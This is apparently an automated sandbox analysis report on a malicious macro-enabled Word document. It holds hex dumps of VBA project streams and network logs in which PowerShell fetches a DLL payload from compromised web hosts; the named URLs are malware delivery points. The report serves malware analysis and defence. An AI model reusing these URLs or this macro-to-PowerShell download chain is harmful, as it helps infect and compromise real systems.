                                        Data ASCII:I D = " { 2 9 5 B 6 3 F 5 - 9 1 F 2 - 4 C D 4 - 9 F 3 3 - 2 8 A 3 2 3 E 7 5 3 5 E } " . . D o c u m e n t = M 3 5 5 v v c _ q f a / & H 0 0 0 0 0 0 0 0 . . M o d u l e = A b l j q x j k b k 2 v y _ l w k . . M o d u l e = G 8 g 2 g k h 6 b w r y _ _ u i . . E x e N a m e 3 2 = " L 9 0 7 d 5 k 7 i f h z f 8 e l k " . . N a m e = " D D " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 E 0 C C 7 D 5 C 7 D 5 C 3 D 9 C 3 D 9 C 3 D 9 C 3 D 9
                                        Data Raw:49 44 3d 22 7b 32 39 35 42 36 33 46 35 2d 39 31 46 32 2d 34 43 44 34 2d 39 46 33 33 2d 32 38 41 33 32 33 45 37 35 33 35 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4d 33 35 35 76 76 63 5f 71 66 61 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 41 62 6c 6a 71 78 6a 6b 62 6b 32 76 79 5f 6c 77 6b 0d 0a 4d 6f 64 75 6c 65 3d 47 38 67 32 67 6b 68 36 62 77 72 79 5f 5f 75 69 0d
                                        Stream Path: Macros/PROJECTwm, File Type: Clarion Developer (v2 and above) memo data, Stream Size: 143
                                        General
                                        Stream Path:Macros/PROJECTwm
                                        File Type:Clarion Developer (v2 and above) memo data
                                        Stream Size:143
                                        Entropy:3.74033053781
                                        Base64 Encoded:False
                                        Data ASCII:M 3 5 5 v v c _ q f a . M . 3 . 5 . 5 . v . v . c . _ . q . f . a . . . A b l j q x j k b k 2 v y _ l w k . A . b . l . j . q . x . j . k . b . k . 2 . v . y . _ . l . w . k . . . G 8 g 2 g k h 6 b w r y _ _ u i . G . 8 . g . 2 . g . k . h . 6 . b . w . r . y . _ . _ . u . i . . . . .
                                        Data Raw:4d 33 35 35 76 76 63 5f 71 66 61 00 4d 00 33 00 35 00 35 00 76 00 76 00 63 00 5f 00 71 00 66 00 61 00 00 00 41 62 6c 6a 71 78 6a 6b 62 6b 32 76 79 5f 6c 77 6b 00 41 00 62 00 6c 00 6a 00 71 00 78 00 6a 00 6b 00 62 00 6b 00 32 00 76 00 79 00 5f 00 6c 00 77 00 6b 00 00 00 47 38 67 32 67 6b 68 36 62 77 72 79 5f 5f 75 69 00 47 00 38 00 67 00 32 00 67 00 6b 00 68 00 36 00 62 00 77 00 72
                                        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5999
                                        General
                                        Stream Path:Macros/VBA/_VBA_PROJECT
                                        File Type:data
                                        Stream Size:5999
                                        Entropy:5.68646242434
                                        Base64 Encoded:False
                                        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                        Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 673
                                        General
                                        Stream Path:Macros/VBA/dir
                                        File Type:data
                                        Stream Size:673
                                        Entropy:6.39911199811
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . D 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . i . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . . . m . . . . ! O f f i c
                                        Data Raw:01 9d b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 44 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 bc 69 fa 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                        Stream Path: WordDocument, File Type: data, Stream Size: 110549
                                        General
                                        Stream Path:WordDocument
                                        File Type:data
                                        Stream Size:110549
                                        Entropy:7.12253058621
                                        Base64 Encoded:True
                                        Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . u . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . b . . . . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 a1 75 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 d5 af 01 00 62 7f 00 00 62 7f 00 00 a1 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                        Stream Path: word, File Type: data, Stream Size: 1936
                                        General
                                        Stream Path:word
                                        File Type:data
                                        Stream Size:1936
                                        Entropy:7.89613362831
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . B . : a . p + m } . . . 0 & . K p . , . . . . : . . . 0 . e : 3 * t . . . . . o k j & ' . ^ . . 2 c % . c . . E . . . v . . . . . . . B . . . . . . . . j . . . . ~ ? 1 . Z . . . . . . . p . . { . . . . F . D . . ' # n . O . . p . . . z . s ! . e . 4 , . 8 . . . . . . T . . . & ) 3 w / . T . . . t . 5 . L . . . . . . . . . L . . . 0 . . D J . T . @ . t . . I b ; . . . . ` t . G . . . G F D * . . . . . l / . W . . . U . L . . | . + I . . B . . . m B . . G . ~ . . . . . . . { ; C . . . . . . %
                                        Data Raw:af 95 f0 90 e4 f9 42 b2 3a 61 09 70 2b 6d 7d e6 bb f9 30 26 92 4b 70 e7 2c 14 1f fc 92 3a 7f ef f9 30 e2 65 3a 33 2a 74 e4 a6 a3 8f ea 6f 6b 6a 26 27 8a 5e db f3 32 63 25 08 63 d0 d9 45 20 ff e2 1a 76 fa 8a 18 ac 87 ce bc 42 eb a7 e1 fd bc a9 b5 d6 6a b0 20 13 05 fe 7e 3f 31 d0 5a 9a 9e 86 a4 ac d0 f9 70 df 0e 7b 03 8f 1f b1 46 bc 44 0b a6 27 23 6e b5 4f c1 06 70 fc 0c d8 7a b6 73

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        01/25/21-18:41:15.656947ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 25, 2021 18:41:13.270375967 CET4916580192.168.2.22162.241.253.129
                                        Jan 25, 2021 18:41:13.439429998 CET8049165162.241.253.129192.168.2.22
                                        Jan 25, 2021 18:41:13.439626932 CET4916580192.168.2.22162.241.253.129
                                        Jan 25, 2021 18:41:13.442131996 CET4916580192.168.2.22162.241.253.129
                                        Jan 25, 2021 18:41:13.612253904 CET8049165162.241.253.129192.168.2.22
                                        Jan 25, 2021 18:41:13.626480103 CET8049165162.241.253.129192.168.2.22
                                        Jan 25, 2021 18:41:13.644927979 CET4916580192.168.2.22162.241.253.129
                                        Jan 25, 2021 18:41:13.854820967 CET8049165162.241.253.129192.168.2.22
                                        Jan 25, 2021 18:41:13.890619040 CET8049165162.241.253.129192.168.2.22
                                        Jan 25, 2021 18:41:13.890644073 CET8049165162.241.253.129192.168.2.22
                                        Jan 25, 2021 18:41:13.890659094 CET8049165162.241.253.129192.168.2.22
                                        Jan 25, 2021 18:41:13.890676022 CET8049165162.241.253.129192.168.2.22
                                        Jan 25, 2021 18:41:13.890692949 CET8049165162.241.253.129192.168.2.22
                                        Jan 25, 2021 18:41:13.890708923 CET8049165162.241.253.129192.168.2.22
                                        Jan 25, 2021 18:41:13.890867949 CET4916580192.168.2.22162.241.253.129
                                        Jan 25, 2021 18:41:13.999680042 CET8049165162.241.253.129192.168.2.22
                                        Jan 25, 2021 18:41:14.202847004 CET4916580192.168.2.22162.241.253.129
                                        Jan 25, 2021 18:41:15.644818068 CET4916680192.168.2.22124.156.135.253
                                        Jan 25, 2021 18:41:18.649360895 CET4916680192.168.2.22124.156.135.253
                                        Jan 25, 2021 18:41:18.893965960 CET8049165162.241.253.129192.168.2.22
                                        Jan 25, 2021 18:41:18.894093037 CET4916580192.168.2.22162.241.253.129
                                        Jan 25, 2021 18:41:24.655850887 CET4916680192.168.2.22124.156.135.253
                                        Jan 25, 2021 18:41:36.874211073 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.046713114 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.046950102 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.047234058 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.219583035 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.270761013 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.270806074 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.270848036 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.270880938 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.270903111 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.270925045 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.270942926 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.270945072 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.270966053 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.270987034 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.270999908 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.271013975 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.271023989 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.271064997 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.443494081 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443528891 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443553925 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443577051 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443598986 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443613052 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.443639040 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443650961 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.443672895 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443681955 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.443705082 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443727970 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443763971 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.443779945 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443797112 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443813086 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443829060 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443836927 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.443851948 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443860054 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.443875074 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443890095 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443898916 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.443917036 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443933964 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443943024 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.443958998 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.443974018 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.443985939 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.444046974 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.444250107 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.616776943 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.616841078 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.616868019 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.616893053 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.616920948 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.616945982 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.616972923 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.616991997 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.617007971 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.617031097 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.617057085 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.617082119 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.617091894 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.617119074 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.617130995 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.617156029 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.617182970 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.617194891 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.617223978 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.617248058 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.617261887 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.617292881 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.617302895 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.617326021 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.617369890 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.617419958 CET804916723.227.169.146192.168.2.22
                                        Jan 25, 2021 18:41:37.617429018 CET4916780192.168.2.2223.227.169.146
                                        Jan 25, 2021 18:41:37.617453098 CET804916723.227.169.146192.168.2.22

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 25, 2021 18:41:13.113156080 CET5219753192.168.2.228.8.8.8
                                        Jan 25, 2021 18:41:13.256899118 CET53521978.8.8.8192.168.2.22
                                        Jan 25, 2021 18:41:14.014039040 CET5309953192.168.2.228.8.8.8
                                        Jan 25, 2021 18:41:15.014322996 CET5309953192.168.2.228.8.8.8
                                        Jan 25, 2021 18:41:15.644002914 CET53530998.8.8.8192.168.2.22
                                        Jan 25, 2021 18:41:15.656841040 CET53530998.8.8.8192.168.2.22
                                        Jan 25, 2021 18:41:36.699511051 CET5283853192.168.2.228.8.8.8
                                        Jan 25, 2021 18:41:36.873501062 CET53528388.8.8.8192.168.2.22

                                        ICMP Packets

                                        TimestampSource IPDest IPChecksumCodeType
                                        Jan 25, 2021 18:41:15.656946898 CET192.168.2.228.8.8.8d015(Port unreachable)Destination Unreachable

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Jan 25, 2021 18:41:13.113156080 CET192.168.2.228.8.8.80x8c10Standard query (0)uagritech.comA (IP address)IN (0x0001)
                                        Jan 25, 2021 18:41:14.014039040 CET192.168.2.228.8.8.80x644cStandard query (0)www.91yudao.comA (IP address)IN (0x0001)
                                        Jan 25, 2021 18:41:15.014322996 CET192.168.2.228.8.8.80x644cStandard query (0)www.91yudao.comA (IP address)IN (0x0001)
                                        Jan 25, 2021 18:41:36.699511051 CET192.168.2.228.8.8.80xd372Standard query (0)yourcleanersurfaces.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Jan 25, 2021 18:41:13.256899118 CET8.8.8.8192.168.2.220x8c10No error (0)uagritech.com162.241.253.129A (IP address)IN (0x0001)
                                        Jan 25, 2021 18:41:15.644002914 CET8.8.8.8192.168.2.220x644cNo error (0)www.91yudao.com124.156.135.253A (IP address)IN (0x0001)
                                        Jan 25, 2021 18:41:15.656841040 CET8.8.8.8192.168.2.220x644cNo error (0)www.91yudao.com124.156.135.253A (IP address)IN (0x0001)
                                        Jan 25, 2021 18:41:36.873501062 CET8.8.8.8192.168.2.220xd372No error (0)yourcleanersurfaces.com23.227.169.146A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • uagritech.com
                                        • yourcleanersurfaces.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.2249165162.241.253.12980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampkBytes transferredDirectionData
                                        Jan 25, 2021 18:41:13.442131996 CET0OUTGET /cgi-bin/a5G/ HTTP/1.1
                                        Host: uagritech.com
                                        Connection: Keep-Alive
                                        Jan 25, 2021 18:41:13.626480103 CET1INHTTP/1.1 302 Found
                                        Date: Mon, 25 Jan 2021 17:41:13 GMT
                                        Server: Apache
                                        Location: http://uagritech.com/cgi-sys/suspendedpage.cgi
                                        Content-Length: 230
                                        Keep-Alive: timeout=5, max=75
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 75 61 67 72 69 74 65 63 68 2e 63 6f 6d 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://uagritech.com/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>
                                        Jan 25, 2021 18:41:13.644927979 CET1OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                        Host: uagritech.com
                                        Jan 25, 2021 18:41:13.890619040 CET2INHTTP/1.1 200 OK
                                        Date: Mon, 25 Jan 2021 17:41:13 GMT
                                        Server: Apache
                                        Vary: Accept-Encoding
                                        host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html
                                        Data Raw: 31 64 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 6f 75 6e 74 20 53 75 73 70 65 6e 64 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 75 73 65 2e 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 73 2f 76 35 2e 30 2e 36 2f 63 73 73 2f 61 6c 6c 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a
                                        Data Ascii: 1dc4<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1"> <title>Account Suspended</title> <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css"> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF;


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.224916723.227.169.14680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampkBytes transferredDirectionData
                                        Jan 25, 2021 18:41:37.047234058 CET10OUTGET /four-monks-acasz/O2my/ HTTP/1.1
                                        Host: yourcleanersurfaces.com
                                        Connection: Keep-Alive
                                        Jan 25, 2021 18:41:37.270761013 CET12INHTTP/1.1 200 OK
                                        Date: Mon, 25 Jan 2021 17:41:37 GMT
                                        Server: Apache
                                        Cache-Control: no-cache, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 25 Jan 2021 17:41:37 GMT
                                        Content-Disposition: attachment; filename="N8PGIlXzvsz3f.dll"
                                        Content-Transfer-Encoding: binary
                                        Set-Cookie: 600f02d12f27f=1611596497; expires=Mon, 25-Jan-2021 17:42:37 GMT; Max-Age=60; path=/
                                        Last-Modified: Mon, 25 Jan 2021 17:41:37 GMT
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Transfer-Encoding: chunked
                                        Content-Type: application/octet-stream
